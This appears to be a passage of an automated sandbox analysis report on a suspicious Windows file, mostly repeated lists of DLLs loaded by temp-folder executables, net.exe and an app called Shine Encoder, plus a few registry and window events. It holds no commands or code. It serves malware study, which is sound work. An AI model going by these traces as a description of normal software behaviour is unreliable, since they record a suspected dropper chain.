Source: C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp	Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp	Section loaded: msacm32.dll
Source: C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp	Section loaded: winmmbase.dll
Source: C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp	Section loaded: winmmbase.dll
Source: C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp	Section loaded: msftedit.dll
Source: C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp	Section loaded: windows.globalization.dll
Source: C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp	Section loaded: bcp47mrm.dll
Source: C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp	Section loaded: globinputhost.dll
Source: C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp	Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp	Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp	Section loaded: sfc.dll
Source: C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp	Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe	Section loaded: sqlite3.dll
Source: C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe	Section loaded: appxsip.dll
Source: C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe	Section loaded: opcservices.dll
Source: C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: dsrole.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: logoncli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: windows.shell.servicehostbuilder.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: ieframe.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: wkscli.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: mlang.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: policymanager.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: msvcp110_win.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: ieframe.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: wkscli.dll
Source: C:\Users\user\AppData\Local\Temp\1006441001\df5dd36577.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1006441001\df5dd36577.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1006441001\df5dd36577.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1006441001\df5dd36577.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1006441001\df5dd36577.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1006441001\df5dd36577.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1006441001\df5dd36577.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1006441001\df5dd36577.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1006441001\df5dd36577.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1006441001\df5dd36577.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1006441001\df5dd36577.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1006441001\df5dd36577.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1006441001\df5dd36577.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1006441001\df5dd36577.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1006441001\df5dd36577.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1006441001\df5dd36577.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1006441001\df5dd36577.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1006441001\df5dd36577.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1006441001\df5dd36577.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1006441001\df5dd36577.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: windows.shell.servicehostbuilder.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: ieframe.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: wkscli.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: mlang.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: policymanager.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: msvcp110_win.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: ieframe.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: wkscli.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1006441001\df5dd36577.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1006441001\df5dd36577.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1006441001\df5dd36577.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1006441001\df5dd36577.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1006441001\df5dd36577.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1006441001\df5dd36577.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1006441001\df5dd36577.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1006441001\df5dd36577.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1006441001\df5dd36577.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1006441001\df5dd36577.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1006441001\df5dd36577.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1006441001\df5dd36577.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1006441001\df5dd36577.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1006441001\df5dd36577.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1006441001\df5dd36577.exe	Section loaded: iphlpapi.dll

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner

Source: C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp

Window found: window name: TMainForm

Source: C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp

File opened: C:\Windows\SysWOW64\MSFTEDIT.DLL

